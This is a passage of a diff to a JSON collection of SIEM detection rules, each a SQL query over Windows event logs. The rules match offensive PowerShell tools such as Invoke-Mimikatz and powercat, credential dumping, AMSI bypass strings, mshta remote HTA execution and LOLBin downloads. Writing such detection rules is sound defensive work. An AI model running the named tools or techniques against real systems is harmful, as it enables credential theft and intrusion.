ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT ((HostApplication LIKE 'powershell%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\') OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "posh_pc_alternate_powershell_hosts.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "title": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", + "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_pressanykey_lolbin_execution.yml" }, { - "title": "Suspicious Get Local Groups Information - PowerShell", - "id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "title": "Application Whitelisting Bypass via PresentationHost.exe", + "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "status": "experimental", - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "falsepositives": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_lolbin_presentationhost.yml" + }, + { + "title": "Suspicious ConfigSecurityPolicy Execution", + "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "status": "experimental", + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%get-localgroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Get-WMIObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Group%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_local_group_reco.yml" + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" }, { - "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "id": "603c6630-5225-49c1-8047-26c964553e0e", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Potential In-Memory Execution Using Reflection.Assembly", - "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "title": "Potential Arbitrary File Download Using Office Application", + "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "status": "experimental", - "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", - "author": "frack113", + "description": "Detects potential arbitrary file download using a Microsoft Office application", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\') OR OriginalFileName IN ('Excel.exe', 'POWERPNT.EXE', 'WinWord.exe')) AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" ], - "filename": "posh_ps_dotnet_assembly_from_file.yml" + "filename": "proc_creation_win_office_arbitrary_cli_download.yml" }, { - "title": "Suspicious Invoke-Item From Mount-DiskImage", - "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "title": "PUA - Adidnsdump Execution", + "id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%adidnsdump%' ESCAPE '\\')" ], - "filename": "posh_ps_run_from_mount_diskimage.yml" + "filename": "proc_creation_win_python_adidnsdump.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", - "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockLogging LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockLogging LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Windows PowerShell Upload Web Request", - "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", - "status": "experimental", - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", - "author": "frack113", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ - "attack.exfiltration", - "attack.t1020" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_upload.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Change User Agents with WebRequest", - "id": "d4488827-73af-4f8d-9244-7b7662ef046e", + "title": "Suspicious Extrac32 Execution", + "id": "aa8e035d-7be4-48d3-a944-102aec04400d", "status": "experimental", - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "description": "Download or Copy file with Extrac32", "author": "frack113", "tags": [ "attack.command_and_control", - "attack.t1071.001" + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" - ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" - }, - { - "title": "Suspicious X509Enrollment - Ps Script", - "id": "504d63cb-0dba-4d02-8531-e72981aace2c", - "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "posh_ps_x509enrollment.yml" + "filename": "proc_creation_win_lolbin_extrac32.yml" }, { - "title": "Powershell LocalAccount Manipulation", - "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "title": "Direct Autorun Keys Modification", + "id": "24357373-078f-44ed-9ac4-6d334a668a11", "status": "test", - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "author": "frack113", + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.persistence", - "attack.t1098" + "attack.t1547.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" ], - "filename": "posh_ps_localuser.yml" + "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" }, { - "title": "PowerShell WMI Win32_Product Install MSI", - "id": "91109523-17f0-4248-a800-f81d9e7c081d", + "title": "Remote Access Tool - RURAT Execution From Unusual Location", + "id": "e01fa958-6893-41d4-ae03-182477c5e77d", "status": "experimental", - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", - "author": "frack113", + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" ], - "filename": "posh_ps_win32_product_install_msi.yml" + "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "status": "test", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' 